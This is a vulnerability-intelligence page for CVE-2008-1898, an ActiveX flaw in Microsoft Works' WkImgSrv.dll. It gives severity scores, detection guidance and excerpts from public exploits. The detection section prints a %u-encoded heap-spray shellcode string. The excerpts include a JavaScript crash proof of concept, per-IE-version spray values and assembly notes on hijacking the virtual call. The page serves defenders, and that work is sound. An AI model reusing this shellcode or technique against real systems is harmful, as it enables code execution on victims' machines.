CVE-2008-1898
published 2008-04-21CVE-2008-1898: A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to…
PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
52.03%
98.8th percentile
A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | works | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u0A0A%u0A0A
bytes↗
%u9090%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063
- →Monitor for ActiveX instantiation of WkImgSrv.dll and assignment of a negative integer or the specific heap-spray values (168430090 / 0x0A0A0A0A for IE7, 202116108 / 0x0C0C0C0C for IE6) to the WksPictureInterface property. ↗
- →Heap spray detection: look for large memory regions filled with repeated 0x0A bytes (IE7 vector) or 0x05 bytes (IE6 vector) targeting address 0x0A0A0A0A or 0x0C0C0C0C respectively. ↗
- →The exploit delivers an HTML file (default name msf.html) containing JavaScript heap spray and an ActiveX object invoking WksPictureInterface; inspect web traffic or dropped files for this pattern. ↗
- →The crash/exploitation path involves a bad virtual-call: EAX is set to the attacker-controlled integer, [EAX] is dereferenced into ECX, then CALL [ECX+0x30] is executed — watch for access violations at 0x0A0A0A0A or 0x0C0C0C0C in browser processes. ↗
- ·The heap-spray integer value must be changed depending on the target IE version: 168430090 (0x0A0A0A0A) for IE 7, 202116108 (0x0C0C0C0C) for IE 6. ↗
- ·The ActiveX control is not marked safe for scripting, so the attack vector requires the attacker to choose an appropriate delivery mechanism (e.g., a crafted HTML file rather than a drive-by from an arbitrary site). ↗
- ·Standard NOP-sled (0x90) heap spray cannot be used because 0x90909090 is an invalid memory address in this context; the spray byte must be a single-byte instruction whose 4-byte repetition forms a valid, self-referencing address. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q85g-qvvf-hm5m: A certain ActiveX control in WkImgSrv
ghsa_unreviewed·2022-05-01
CVE-2008-1898 [HIGH] CWE-20 GHSA-q85g-qvvf-hm5m: A certain ActiveX control in WkImgSrv
A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.
VulnCheck
Microsoft Office Improper Input Validation
vulncheck·2008·CVSS 9.3
CVE-2008-1898 [CRITICAL] Microsoft Office Improper Input Validation
Microsoft Office Improper Input Validation
A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.
Affected: Microsoft Office
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20110827052151/http://community.websense.com/blogs/securitylabs/archive/2011/04/21/presley-walker-google-image-search-results-poisoned.aspx
No detection rules found.
Exploit-DB
Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
exploitdb·2010-09-25
CVE-2008-1898 Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
---
##
# $Id: msworks_wkspictureinterface.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit',
'Description' => %q{
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker
to execute arbitrary code on a system. By passing a negative integer to the
WksPictureInterface method, an attacker could execute arbitrary code on the system
with privil
Exploit-DB
Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow
exploitdb·2008-05-02
CVE-2008-1898 Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow
Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow
---
MOV ESI,DWORD PTR SS:[EBP+8] ; Do some other stuffs, we don't care
00D473D8 LEA EDX,DWORD PTR SS:[EBP-1C] ;
00D473DB PUSH EDX
00D473DC PUSH EAX
00D473DD MOV DWORD PTR DS:[ESI+2A0],EAX ; =============
00D473E3 ==> MOV ECX,DWORD PTR DS:[EAX] ; Here is the
problem,the data stored by EAX is referenced and moved into ECX
00D473E5 CALL DWORD PTR DS:[ECX+30] ;Next the address
in some struct pointed by ECX is called
Now if we're able to setup memory satisfied :
Create a struct in memory where the first DWORD in the struct point to
itself and the DWORD at offset 0x30 from struct address is point to
our shellcode.
We should be able to exploit this vulnerability.
This seem to be nightmare because there is nothing to inject excep
Exploit-DB
Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)
exploitdb·2008-04-17
CVE-2008-1898 Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)
Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)
---
Microsoft Works 7 WkImgSrv.dll crash POC
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
# milw0rm.com [2008-04-17]
Metasploit
Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution
metasploit
Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution
Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2008-05/0029.htmlhttp://blogs.technet.com/swi/archive/2008/06/05/why-there-wont-be-a-security-update-for-wkimgsrv-dll.aspxhttp://www.securityfocus.com/archive/1/491027/100/0/threadedhttp://www.securityfocus.com/bid/28820https://exchange.xforce.ibmcloud.com/vulnerabilities/41876https://www.exploit-db.com/exploits/5460https://www.exploit-db.com/exploits/5530http://archives.neohapsis.com/archives/fulldisclosure/2008-05/0029.htmlhttp://blogs.technet.com/swi/archive/2008/06/05/why-there-wont-be-a-security-update-for-wkimgsrv-dll.aspxhttp://www.securityfocus.com/archive/1/491027/100/0/threadedhttp://www.securityfocus.com/bid/28820https://exchange.xforce.ibmcloud.com/vulnerabilities/41876https://www.exploit-db.com/exploits/5460https://www.exploit-db.com/exploits/5530
2008-04-21
Published
Exploited in the wild